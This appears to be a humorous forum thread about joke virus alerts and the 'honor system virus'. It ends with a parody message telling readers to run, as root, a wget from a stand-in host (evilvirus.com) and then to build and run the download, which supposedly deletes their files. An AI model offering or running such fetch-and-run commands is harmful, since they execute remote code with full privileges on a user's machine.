This works with the honor system:

Oh, I could have some fun with this.

I used to send some virus alerts out that were so outrageous, there was no possible way they could be true.

It had things like "If you open an email with that subject, it will erase your credit cards, cause your milk to spoil, cover the walls in your house with polka dots, and cause your VCR to flash 12:00."

Surprisingly, some people believed me. Of course, now "Weird Al" Yankovic has a song called "Virus Alert" that uses that same idea.

But then, I still remember the Y2K warning that I got in the email warning me that my toaster and refrigerator would stop working on Jan. 1, 2000. So people will believe almost anything.

Hello, you have received the GPL honor system virus. It should format your harddisk, but the volunteers haven't implemented this functionality yet. If you want to have your files deleted, please modify the GPL'd source code of this virus. Don't forget to send us back the patches! Also, since this is GPL, you are encouraged to spread this virus, using either GPL v2 or GPL v3, to your mail contacts.

I've attached a really horrible virus, it emails itself and erases your hard drive, it's such a shame that I havn't got it working yet, for now your going to have to do everything manual when it asks you to. It looks cool though, you've got to give me that.

Hi! I'm the honor system virus. In order to load this virus properly onto your system, please do the following steps, entering them into a root shell with full hard disk privileges and with all network ports open:

- wget http://www.evilvirus.com/virus.tar.gz
- tar -xvzf virus.tar.gz
- cd virus
- chmod +x configurevirus.sh
- ./configurevirus.sh (might take 5 minutes while it says 'CONFIGURING VIRUS...')
- make virus
- make install virus
- cd bin
- ./virus (then wait about 3 hours while it examines your files, then eventually deletes them.)

While the virus is having fun, please forward this to five friends!
